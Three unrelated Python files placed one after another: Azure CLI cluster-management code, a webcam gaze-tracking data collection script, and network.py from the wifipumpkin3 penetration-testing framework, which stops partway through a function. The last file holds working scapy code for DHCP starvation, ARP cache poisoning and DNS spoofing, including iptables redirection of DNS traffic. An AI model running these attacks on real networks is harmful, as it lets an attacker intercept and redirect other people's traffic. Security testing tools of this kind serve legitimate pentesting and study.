namespace='Microsoft.Network', type='virtualNetwork',
name=vnet_peer
)
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(
vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd,
cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError(
'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError(
'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_show(cmd, client, resource_group_name, name):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(
compute_count) # pylint: disable=no-member
    # null out the AAD profile and manually add the master pool name, because otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or
managed_cluster.identity.type.casefold() == "userassigned"))
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
    # some addons require post-cluster-creation role assignment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
_add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not _create_role_assignment(cmd, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
                               'ACR to it; you can manually grant permission to the identity '
                               'named <CLUSTER_NAME>-agentpool in the MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _ensure_cluster_identity_permission_on_kubelet_identity(cmd, cluster_identity_object_id, scope):
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cmd, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise UnauthorizedError('Could not grant Managed Identity Operator '
'permission to cluster identity at scope {}'.format(scope))
|
data_creation_game2.py
|
#!/usr/bin/env python3
"""Main script for gaze direction inference from webcam feed."""
import argparse
import os
import queue
import threading
import time
import coloredlogs
import cv2 as cv
import numpy as np
import tensorflow.compat.v1 as tf  # the script uses the TF1 API (ConfigProto, Session, tf.logging)
import pyautogui
import random
tf.disable_v2_behavior()
from datasources import Video, Webcam
from models import ELG
import util.gaze
def get_face_orient(image, landmarks):
if not len(landmarks):
return {}
size = image.shape
image_points = landmarks[0]
# 3D model points.
model_points = np.array([
(0.0, 0.0, 0.0), # Nose tip
(0.0, -330.0, -65.0), # Chin
(-225.0, 170.0, -135.0), # Left eye left corner
        (225.0, 170.0, -135.0),      # Right eye right corner
(-150.0, -150.0, -125.0), # Left Mouth corner
(150.0, -150.0, -125.0) # Right mouth corner
])
# Camera internals
focal_length = size[1]
center = (size[1]/2, size[0]/2)
camera_matrix = np.array(
[[focal_length, 0, center[0]],
[0, focal_length, center[1]],
[0, 0, 1]], dtype = "double"
)
#print ("Camera Matrix :\n {0}".format(camera_matrix))
dist_coeffs = np.zeros((4,1)) # Assuming no lens distortion
(success, rotation_vector, translation_vector) = cv.solvePnP(model_points, image_points, camera_matrix, dist_coeffs)
#print ("Rotation Vector:\n {0}".format(rotation_vector))
#print ("Translation Vector:\n {0}".format(translation_vector))
# Project a 3D point (0, 0, 1000.0) onto the image plane.
# We use this to draw a line sticking out of the nose
(nose_end_point2D, jacobian) = cv.projectPoints(np.array([(0.0, 0.0, 1000.0)]), rotation_vector, translation_vector, camera_matrix, dist_coeffs)
# for p in image_points:
# cv.circle(image, (int(p[0]), int(p[1])), 3, (0,0,255), -1)
p1 = ( int(image_points[0][0]), int(image_points[0][1]))
p2 = ( int(nose_end_point2D[0][0][0]), int(nose_end_point2D[0][0][1]))
cv.line(image, p1, p2, (255,0,0), 2)
return {'rotation_vector':rotation_vector, 'translation_vector':translation_vector}
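# --- illustrative sketch (not part of the original script) ---
# get_face_orient returns the raw solvePnP rotation/translation vectors. If
# yaw/pitch/roll angles are wanted instead (e.g. to log head pose next to the
# gaze data), one common conversion goes through cv.Rodrigues; this hypothetical
# helper sketches that conversion and is not called by the original pipeline.
def face_orientation_to_euler(rotation_vector):
    R, _ = cv.Rodrigues(rotation_vector)           # 3x3 rotation matrix
    sy = np.sqrt(R[0, 0] ** 2 + R[1, 0] ** 2)
    if sy > 1e-6:
        pitch = np.arctan2(R[2, 1], R[2, 2])
        yaw = np.arctan2(-R[2, 0], sy)
        roll = np.arctan2(R[1, 0], R[0, 0])
    else:                                          # near gimbal lock
        pitch = np.arctan2(-R[1, 2], R[1, 1])
        yaw = np.arctan2(-R[2, 0], sy)
        roll = 0.0
    return np.degrees([pitch, yaw, roll])          # degrees: [pitch, yaw, roll]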
def game_init():
# init game screen
#args.headless = True
screenSize = pyautogui.size()
screen = np.zeros([screenSize.height,screenSize.width,3],dtype=np.uint8)
screen.fill(255)
cv.circle(screen, (int(screenSize.width/2),int(screenSize.height/2)), 10, (0,0,255), -1)
#cv.namedWindow("window", cv.WND_PROP_FULLSCREEN)
#cv.setWindowProperty("window",cv.WND_PROP_FULLSCREEN,cv.WINDOW_FULLSCREEN)
return screen
def game_save_data(data):
pass
def create_dot(screen, screenSize):
    x = random.randint(0, screenSize.width - 1)   # keep the dot centre on-screen
    y = random.randint(0, screenSize.height - 1)
cv.circle(screen, (x,y), 10, (0,0,255), -1)
def game_update(save_data):
data = {}
if "face_orientation" in frame:
data["face_orientation"] = frame["face_orientation"]
data["eye_L"] = frame["eyes"][0]
data["eye_R"] = frame["eyes"][1]
print(data)
print("#######################################")
cv.putText(screen, 'face', (10,30), cv.FONT_HERSHEY_SIMPLEX, 1, (0,255,0),2, cv.LINE_AA)
if save_data:
game_save_data(data)
screen.fill(255)
create_dot(screen, pyautogui.size())
else:
cv.putText(screen, 'face', (10,30), cv.FONT_HERSHEY_SIMPLEX, 1, (0,0,255),2, cv.LINE_AA)
if frame["eyes"][0]["side"] !="left":
print("ERROR, first eye was not left")
import sys
sys.exit()
def parseArgs():
# Set global log level
parser = argparse.ArgumentParser(description='Demonstration of landmarks localization.')
parser.add_argument('-v', type=str, help='logging level', default='info',
choices=['debug', 'info', 'warning', 'error', 'critical'])
parser.add_argument('--from_video', type=str, help='Use this video path instead of webcam')
parser.add_argument('--record_video', type=str, help='Output path of video of demonstration.')
parser.add_argument('--fullscreen', action='store_true')
parser.add_argument('--headless', action='store_true')
parser.add_argument('--fps', type=int, default=60, help='Desired sampling rate of webcam')
parser.add_argument('--camera_id', type=int, default=0, help='ID of webcam to use')
args = parser.parse_args()
return args
def gazeInit(args):
# Declare some parameters
batch_size = 2
# Define webcam stream data source
# Change data_format='NHWC' if not using CUDA
if args.from_video:
assert os.path.isfile(args.from_video)
data_source = Video(args.from_video,
tensorflow_session=session, batch_size=batch_size,
data_format='NCHW' if gpu_available else 'NHWC',
eye_image_shape=(108, 180))
else:
data_source = Webcam(tensorflow_session=session, batch_size=batch_size,
camera_id=args.camera_id, fps=args.fps,
data_format='NCHW' if gpu_available else 'NHWC',
eye_image_shape=(36, 60))
# Define model
if args.from_video:
model = ELG(
session, train_data={'videostream': data_source},
first_layer_stride=3,
num_modules=3,
num_feature_maps=64,
learning_schedule=[
{
'loss_terms_to_optimize': {'dummy': ['hourglass', 'radius']},
},
],
)
else:
model = ELG(
session, train_data={'videostream': data_source},
first_layer_stride=1,
num_modules=2,
num_feature_maps=32,
learning_schedule=[
{
'loss_terms_to_optimize': {'dummy': ['hourglass', 'radius']},
},
],
)
return data_source, model, batch_size
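# --- illustrative sketch (not part of the original script) ---
# The data_format switch above only changes the tensor layout handed to the
# model: 'NCHW' (channels first, the faster layout on CUDA GPUs) vs 'NHWC'
# (channels last, the layout most TF1 CPU kernels expect). A minimal
# illustration with a dummy grayscale eye batch; the helper name is made up.
def _example_eye_batch_layouts(batch=2, height=36, width=60):
    nhwc = np.zeros((batch, height, width, 1), dtype=np.float32)
    nchw = np.transpose(nhwc, (0, 3, 1, 2))   # -> (batch, channels, height, width)
    return nhwc.shape, nchw.shape             # ((2, 36, 60, 1), (2, 1, 36, 60))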
def _visualize_output():
last_frame_index = 0
last_frame_time = time.time()
fps_history = []
all_gaze_histories = []
gameon = False
space_pressed = False
if args.fullscreen:
cv.namedWindow('vis', cv.WND_PROP_FULLSCREEN)
cv.setWindowProperty('vis', cv.WND_PROP_FULLSCREEN, cv.WINDOW_FULLSCREEN)
while True:
if gameon:
if cv.waitKey(1) & 0xFF == 32:
space_pressed = True
# If no output to visualize, show unannotated frame
if inferred_stuff_queue.empty():
next_frame_index = last_frame_index + 1
if next_frame_index in data_source._frames:
next_frame = data_source._frames[next_frame_index]
if 'faces' in next_frame and len(next_frame['faces']) == 0:
if not args.headless:
cv.imshow('vis', next_frame['bgr'])
last_frame_index = next_frame_index
if cv.waitKey(1) & 0xFF == ord('q'):
return
continue
# Get output from neural network and visualize
output = inferred_stuff_queue.get()
bgr = None
for j in range(batch_size):
if gameon:
if cv.waitKey(1) & 0xFF == 32:
space_pressed = True
frame_index = output['frame_index'][j]
if frame_index not in data_source._frames:
continue
frame = data_source._frames[frame_index]
# Decide which landmarks are usable
heatmaps_amax = np.amax(output['heatmaps'][j, :].reshape(-1, 18), axis=0)
can_use_eye = np.all(heatmaps_amax > 0.7)
can_use_eyelid = np.all(heatmaps_amax[0:8] > 0.75)
can_use_iris = np.all(heatmaps_amax[8:16] > 0.8)
start_time = time.time()
eye_index = output['eye_index'][j]
bgr = frame['bgr']
eye = frame['eyes'][eye_index]
eye_image = eye['image']
eye_side = eye['side']
eye_landmarks = output['landmarks'][j, :]
eye_radius = output['radius'][j][0]
if eye_side == 'left':
eye_landmarks[:, 0] = eye_image.shape[1] - eye_landmarks[:, 0]
eye_image = np.fliplr(eye_image)
# Embed eye image and annotate for picture-in-picture
eye_upscale = 2
eye_image_raw = cv.cvtColor(cv.equalizeHist(eye_image), cv.COLOR_GRAY2BGR)
eye_image_raw = cv.resize(eye_image_raw, (0, 0), fx=eye_upscale, fy=eye_upscale)
eye_image_annotated = np.copy(eye_image_raw)
if can_use_eyelid:
cv.polylines(
eye_image_annotated,
[np.round(eye_upscale*eye_landmarks[0:8]).astype(np.int32)
.reshape(-1, 1, 2)],
isClosed=True, color=(255, 255, 0), thickness=1, lineType=cv.LINE_AA,
)
if can_use_iris:
cv.polylines(
eye_image_annotated,
[np.round(eye_upscale*eye_landmarks[8:16]).astype(np.int32)
.reshape(-1, 1, 2)],
isClosed=True, color=(0, 255, 255), thickness=1, lineType=cv.LINE_AA,
)
cv.drawMarker(
eye_image_annotated,
tuple(np.round(eye_upscale*eye_landmarks[16, :]).astype(np.int32)),
color=(0, 255, 255), markerType=cv.MARKER_CROSS, markerSize=4,
thickness=1, line_type=cv.LINE_AA,
)
face_index = int(eye_index / 2)
eh, ew, _ = eye_image_raw.shape
v0 = face_index * 2 * eh
v1 = v0 + eh
v2 = v1 + eh
u0 = 0 if eye_side == 'left' else ew
u1 = u0 + ew
bgr[v0:v1, u0:u1] = eye_image_raw
bgr[v1:v2, u0:u1] = eye_image_annotated
# Visualize preprocessing results
frame_landmarks = (frame['smoothed_landmarks']
if 'smoothed_landmarks' in frame
else frame['landmarks'])
for f, face in enumerate(frame['faces']):
for landmark in frame_landmarks[f][:-1]:
if gameon:
if cv.waitKey(1) & 0xFF == 32:
space_pressed = True
cv.drawMarker(bgr, tuple(np.round(landmark).astype(np.int32)),
color=(0, 0, 255), markerType=cv.MARKER_STAR,
markerSize=2, thickness=1, line_type=cv.LINE_AA)
cv.rectangle(
bgr, tuple(np.round(face[:2]).astype(np.int32)),
tuple(np.round(np.add(face[:2], face[2:])).astype(np.int32)),
color=(0, 255, 255), thickness=1, lineType=cv.LINE_AA,
)
# Transform predictions
eye_landmarks = np.concatenate([eye_landmarks,
[[eye_landmarks[-1, 0] + eye_radius,
eye_landmarks[-1, 1]]]])
eye_landmarks = np.asmatrix(np.pad(eye_landmarks, ((0, 0), (0, 1)),
'constant', constant_values=1.0))
eye_landmarks = (eye_landmarks *
eye['inv_landmarks_transform_mat'].T)[:, :2]
eye_landmarks = np.asarray(eye_landmarks)
eyelid_landmarks = eye_landmarks[0:8, :]
iris_landmarks = eye_landmarks[8:16, :]
iris_centre = eye_landmarks[16, :]
eyeball_centre = eye_landmarks[17, :]
eyeball_radius = np.linalg.norm(eye_landmarks[18, :] -
eye_landmarks[17, :])
# Smooth and visualize gaze direction
num_total_eyes_in_frame = len(frame['eyes'])
if len(all_gaze_histories) != num_total_eyes_in_frame:
all_gaze_histories = [list() for _ in range(num_total_eyes_in_frame)]
gaze_history = all_gaze_histories[eye_index]
if can_use_eye:
# Visualize landmarks
cv.drawMarker( # Eyeball centre
bgr, tuple(np.round(eyeball_centre).astype(np.int32)),
color=(0, 255, 0), markerType=cv.MARKER_CROSS, markerSize=4,
thickness=1, line_type=cv.LINE_AA,
)
# cv.circle( # Eyeball outline
# bgr, tuple(np.round(eyeball_centre).astype(np.int32)),
# int(np.round(eyeball_radius)), color=(0, 255, 0),
# thickness=1, lineType=cv.LINE_AA,
# )
# Draw "gaze"
# from models.elg import estimate_gaze_from_landmarks
# current_gaze = estimate_gaze_from_landmarks(
# iris_landmarks, iris_centre, eyeball_centre, eyeball_radius)
i_x0, i_y0 = iris_centre
e_x0, e_y0 = eyeball_centre
theta = -np.arcsin(np.clip((i_y0 - e_y0) / eyeball_radius, -1.0, 1.0))
phi = np.arcsin(np.clip((i_x0 - e_x0) / (eyeball_radius * -np.cos(theta)),
-1.0, 1.0))
current_gaze = np.array([theta, phi])
gaze_history.append(current_gaze)
gaze_history_max_len = 10
if len(gaze_history) > gaze_history_max_len:
gaze_history = gaze_history[-gaze_history_max_len:]
util.gaze.draw_gaze(bgr, iris_centre, np.mean(gaze_history, axis=0),
length=120.0, thickness=1)
else:
gaze_history.clear()
if can_use_eyelid:
cv.polylines(
bgr, [np.round(eyelid_landmarks).astype(np.int32).reshape(-1, 1, 2)],
isClosed=True, color=(255, 255, 0), thickness=1, lineType=cv.LINE_AA,
)
if can_use_iris:
cv.polylines(
bgr, [np.round(iris_landmarks).astype(np.int32).reshape(-1, 1, 2)],
isClosed=True, color=(0, 255, 255), thickness=1, lineType=cv.LINE_AA,
)
cv.drawMarker(
bgr, tuple(np.round(iris_centre).astype(np.int32)),
color=(0, 255, 255), markerType=cv.MARKER_CROSS, markerSize=4,
thickness=1, line_type=cv.LINE_AA,
)
### face orientation ########################################
face_landmarks = frame['face_landmarks']
face_orientation = get_face_orient(bgr, face_landmarks)
frame['face_orientation'] = face_orientation
#############################################################
dtime = 1e3*(time.time() - start_time)
if 'visualization' not in frame['time']:
frame['time']['visualization'] = dtime
else:
frame['time']['visualization'] += dtime
def _dtime(before_id, after_id):
return int(1e3 * (frame['time'][after_id] - frame['time'][before_id]))
def _dstr(title, before_id, after_id):
return '%s: %dms' % (title, _dtime(before_id, after_id))
if eye_index == len(frame['eyes']) - 1:
# Calculate timings
frame['time']['after_visualization'] = time.time()
fps = int(np.round(1.0 / (time.time() - last_frame_time)))
fps_history.append(fps)
if len(fps_history) > 60:
fps_history = fps_history[-60:]
fps_str = '%d FPS' % np.mean(fps_history)
last_frame_time = time.time()
fh, fw, _ = bgr.shape
cv.putText(bgr, fps_str, org=(fw - 110, fh - 20),
fontFace=cv.FONT_HERSHEY_DUPLEX, fontScale=0.8,
color=(0, 0, 0), thickness=1, lineType=cv.LINE_AA)
cv.putText(bgr, fps_str, org=(fw - 111, fh - 21),
fontFace=cv.FONT_HERSHEY_DUPLEX, fontScale=0.79,
color=(255, 255, 255), thickness=1, lineType=cv.LINE_AA)
if gameon:
if cv.waitKey(1) & 0xFF == 32:
space_pressed = True
if space_pressed:
game_update(True)
space_pressed = False
cv.imshow('game', screen)
else:
cv.imshow('vis', bgr)
last_frame_index = frame_index
if cv.waitKey(1) & 0xFF == ord('q'):
return
# Print timings
if frame_index % 60 == 0:
latency = _dtime('before_frame_read', 'after_visualization')
processing = _dtime('after_frame_read', 'after_visualization')
timing_string = ', '.join([
_dstr('read', 'before_frame_read', 'after_frame_read'),
_dstr('preproc', 'after_frame_read', 'after_preprocessing'),
'infer: %dms' % int(frame['time']['inference']),
'vis: %dms' % int(frame['time']['visualization']),
'proc: %dms' % processing,
'latency: %dms' % latency,
])
print('%08d [%s] %s' % (frame_index, fps_str, timing_string))
game_update(False)
if gameon:
game_update(False)
cv.imshow('game', screen)
if cv.waitKey(1) & 0xFF == 32:
space_pressed = True
else:
            if cv.waitKey(1) & 0xFF == 32:  # spacebar starts the game
gameon = True
game_init()
if __name__ == '__main__':
args = parseArgs()
coloredlogs.install(
datefmt='%d/%m %H:%M',
fmt='%(asctime)s %(levelname)s %(message)s',
level=args.v.upper(),
)
# Check if GPU is available
from tensorflow.python.client import device_lib
session_config = tf.ConfigProto(gpu_options=tf.GPUOptions(allow_growth=True))
gpu_available = False
try:
gpus = [d for d in device_lib.list_local_devices(config=session_config)
if d.device_type == 'GPU']
gpu_available = len(gpus) > 0
except:
pass
# Initialize Tensorflow session
tf.logging.set_verbosity(tf.logging.INFO)
with tf.Session(config=session_config) as session:
data_source, model, batch_size = gazeInit(args)
# Begin visualization thread
inferred_stuff_queue = queue.Queue()
visualize_thread = threading.Thread(target=_visualize_output, name='visualization')
visualize_thread.daemon = True
visualize_thread.start()
# Do inference forever
infer = model.inference_generator()
screen = game_init()
game_thread = threading.Thread(target=game_update, name="game")
while True:
# keyboard = cv.waitKey(1)
keyboard = -1
output = next(infer)
for frame_index in np.unique(output['frame_index']):
if frame_index not in data_source._frames:
continue
frame = data_source._frames[frame_index]
if 'inference' in frame['time']:
frame['time']['inference'] += output['inference_time']
else:
frame['time']['inference'] = output['inference_time']
#print("nothing to do")
inferred_stuff_queue.put_nowait(output)
            if not visualize_thread.is_alive():
print("visualisation closed, quitting")
break
if not data_source._open:
print("camera closed, quitting")
break
cv.destroyAllWindows()
|
network.py
|
import queue as Queue  # Python 3 module name; keeps any existing Queue.* references working
from os import system
from scapy.all import *
from threading import Thread
from PyQt5.QtCore import (
    QThread,
    QObject,
    QProcess,
    pyqtSlot,
    pyqtSignal,
)
from datetime import datetime
# This file is part of the wifipumpkin3 Open Source Project.
# wifipumpkin3 is licensed under the Apache 2.0.
# Copyright 2020 P0cL4bs Team - Marcos Bomfim (mh4x0f)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class ThreadAttackStar(QThread):
    # PyQt5 requires new-style signals declared on the class; the old
    # self.emit(pyqtSignal("Activated( QString )"), ...) form is not supported.
    Activated = pyqtSignal(str)
    def __init__(self, interface):
QThread.__init__(self)
self.interface = interface
self.process = True
def run(self):
print("Starting Thread:" + self.objectName())
self.count = 0
while self.process:
conf.checkIPaddr = False
dhcp_discover = (
Ether(src=RandMAC(), dst="ff:ff:ff:ff:ff:ff")
/ IP(src="0.0.0.0", dst="255.255.255.255")
/ UDP(sport=68, dport=67)
/ BOOTP(chaddr=RandString(12, "0123456789abcdef"))
/ DHCP(options=[("message-type", "discover"), "end"])
)
sendp(dhcp_discover)
self.count += 1
self.data = "PacketSend:[%s] DISCOVER Interface: %s " % (
self.count,
self.interface,
) + datetime.now().strftime("%c")
            self.Activated.emit(self.data.rstrip())
            self.Activated.emit("[ OFF ] Packet sent: " + str(self.count))
def stop(self):
print("Stop thread:" + self.objectName())
self.process = False
class ThARP_posion(QThread):
    # PyQt5 requires new-style signals declared as class attributes
    Activated = pyqtSignal(str)
def __init__(self, srcAddress, dstAddress, mac):
QThread.__init__(self)
self.srcAddress = srcAddress
self.dstAddress = dstAddress
self.mac = mac
self.process = True
def makePacket(self):
ether = Ether(dst="ff:ff:ff:ff:ff:ff", src=self.mac)
parp = ARP(
hwtype=0x1,
ptype=0x800,
hwlen=0x6,
plen=0x4,
op="is-at",
hwsrc=self.mac,
psrc=self.srcAddress,
hwdst="ff:ff:ff:ff:ff:ff",
pdst=self.dstAddress,
)
padding = Padding(load="\x00" * 18)
packet_arp = ether / parp / padding
return packet_arp
def run(self):
print("Starting Thread:" + self.objectName())
pkt = self.makePacket()
while self.process:
            send(pkt, verbose=False, count=3)
            sendp(pkt, verbose=False, count=3)
def stop(self):
self.process = False
print("Stop thread:" + self.objectName())
        self.Activated.emit("Ok")
class ThreadDNSspoofNF(QObject):
DnsReq = pyqtSignal(object)
def __init__(self, domains, interface, redirect, APmode=True, parent=None):
super(ThreadDNSspoofNF, self).__init__(parent)
self.domains = domains
self.interface = interface
self.redirect = redirect
self.APmode = APmode
self.desc = "DNS spoof Module::NetFilter"
@pyqtSlot()
def readProcessOutput(self):
self.data = str(self.procThreadDNS.readAllStandardOutput())
self.DnsReq.emit(self.data)
def start(self):
self.setIptables(self.APmode, option="A")
self.procThreadDNS = QProcess(self)
self.procThreadDNS.setProcessChannelMode(QProcess.MergedChannels)
        self.procThreadDNS.readyReadStandardOutput.connect(self.readProcessOutput)
self.procThreadDNS.start(
"python",
[
"core/packets/dnsspoofNF.py",
"-r",
self.redirect,
"-d",
",".join(self.domains),
],
)
def setIptables(self, APMode=True, option=str()):
if APMode:
system(
"iptables -{} INPUT -i {} -p udp --dport 53 -s {} -j ACCEPT".format(
option, self.interface, self.redirect
)
)
system(
"iptables -{} INPUT -i {} -p udp --dport 53 -j DROP".format(
option, self.interface
)
)
system(
"iptables -t nat -{} PREROUTING -p udp --dport 53 -j NFQUEUE".format(
option
)
)
def stop(self):
self.setIptables(self.APmode, option="D")
if hasattr(self, "procThreadDNS"):
self.procThreadDNS.terminate()
self.procThreadDNS.waitForFinished()
self.procThreadDNS.kill()
class ThSpoofAttack(QThread):
    # PyQt5 requires new-style signals declared as class attributes
    Activated = pyqtSignal(str)
def __init__(self, domains, interface, filter, verbose, redirect):
QThread.__init__(self)
self.target = domains
self.filter = filter
self.verbose = verbose
self.interface = interface
self.redirect = redirect
self.finished = False
self.mac = get_if_hwaddr(self.interface)
self.desc = ["Module DNS spoof"]
def run(self):
print("Starting Thread:" + self.objectName())
self.sniff()
def ARP(self, target, gateway):
ether = Ether(dst="ff:ff:ff:ff:ff:ff", src=self.mac)
parp = ARP(
hwtype=0x1,
ptype=0x800,
hwlen=0x6,
plen=0x4,
op="is-at",
hwsrc=self.mac,
psrc=gateway,
hwdst="ff:ff:ff:ff:ff:ff",
pdst=target,
)
padding = Padding(load="\x00" * 18)
packet_arp = ether / parp / padding
while True:
try:
sendp(packet_arp, verbose=False, count=3)
send(packet_arp, verbose=False, count=3)
except:
pass
def StartSpoof(self, q):
while self.finished:
sniff(
iface=self.interface,
count=10,
filter=self.filter,
prn=lambda x: q.put(x),
)
def sniff(self):
self.setIptables(option="A")
q = Queue.Queue()
sniffer = Thread(target=self.StartSpoof, args=(q,))
sniffer.daemon = True
sniffer.start()
while not self.finished:
try:
pkt = q.get(timeout=1)
self.Poisoning(pkt)
except Queue.Empty:
pass
def Poisoning(self, packet):
# https://github.com/Adastra-thw/pyHacks/blob/master/MitmDnsSpoofingPoC.py
if (
packet.haslayer(DNS)
and packet.getlayer(DNS).qr == 0
and len(self.target.keys()) > 0
):
if (
packet[DNS].qd.qname[: len(str(packet[DNS].qd.qname)) - 1]
in self.target.keys()
):
requestIP = packet[IP]
requestUDP = packet[UDP]
requestDNS = packet[DNS]
requestDNSQR = packet[DNSQR]
responseIP = IP(src=requestIP.dst, dst=requestIP.src)
responseUDP = UDP(sport=requestUDP.dport, dport=requestUDP.sport)
responseDNSRR = DNSRR(
rrname=packet.getlayer(DNS).qd.qname, rdata=self.redirect
)
responseDNS = DNS(
qr=1, id=requestDNS.id, qd=requestDNSQR, an=responseDNSRR
)
answer = responseIP / responseUDP / responseDNS
send(answer)
elif (
packet.haslayer(DNS)
and packet.getlayer(DNS).qr == 0
and len(self.target.keys()) == 0
):
try:
requestIP = packet[IP]
requestUDP = packet[UDP]
requestDNS = packet[DNS]
requestDNSQR = packet[DNSQR]
responseIP = IP(src=requestIP.dst, dst=requestIP.src)
responseUDP = UDP(sport=requestUDP.dport, dport=requestUDP.sport)
responseDNSRR = DNSRR(
rrname=packet.getlayer(DNS).qd.qname, rdata=self.redirect
)
responseDNS = DNS(
